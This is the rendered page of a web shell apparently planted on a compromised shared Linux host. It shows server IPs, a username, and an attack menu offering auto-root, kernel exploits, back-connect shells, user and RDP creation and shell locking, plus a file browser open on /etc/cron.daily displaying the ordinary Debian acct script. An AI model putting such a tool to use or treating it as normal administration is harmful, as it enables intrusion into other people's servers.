Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
cron.daily /
[ HOME SHELL ]
Name
Size
Permission
Action
.placeholder
102
B
-rw-r--r--
0_delay
112
B
-rwxr-xr-x
acct
564
B
-rwxr-xr-x
apache2
539
B
-rwxr-xr-x
apport
376
B
-rwxr-xr-x
apt-compat
1.44
KB
-rwxr-xr-x
aptitude
314
B
-rwxr-xr-x
debsums
595
B
-rwxr-xr-x
dpkg
123
B
-rwxr-xr-x
logrotate
377
B
-rwxr-xr-x
man-db
1.3
KB
-rwxr-xr-x
ntp
1.37
KB
-rwxr-xr-x
sysstat
518
B
-rwxr-xr-x
tmpreaper
3.91
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : acct
#!/bin/sh test -x /usr/sbin/accton || exit 0 # Source defaults if [ -f /etc/default/acct ] then . /etc/default/acct else ACCT_LOGGING="30" fi # Save log file if [ ! -d /var/log/account ]; then mkdir -p /var/log/account touch /var/log/account/pacct chmod 0640 /var/log/account/pacct* chown root:adm /var/log/account/pacct* fi cd /var/log/account savelog -g adm -m 0640 -u root -c "${ACCT_LOGGING}" /var/log/account/pacct > /dev/null # Restart acct invoke-rc.d acct restart > /dev/null # This is needed because accton.c returns errno exit 0
Close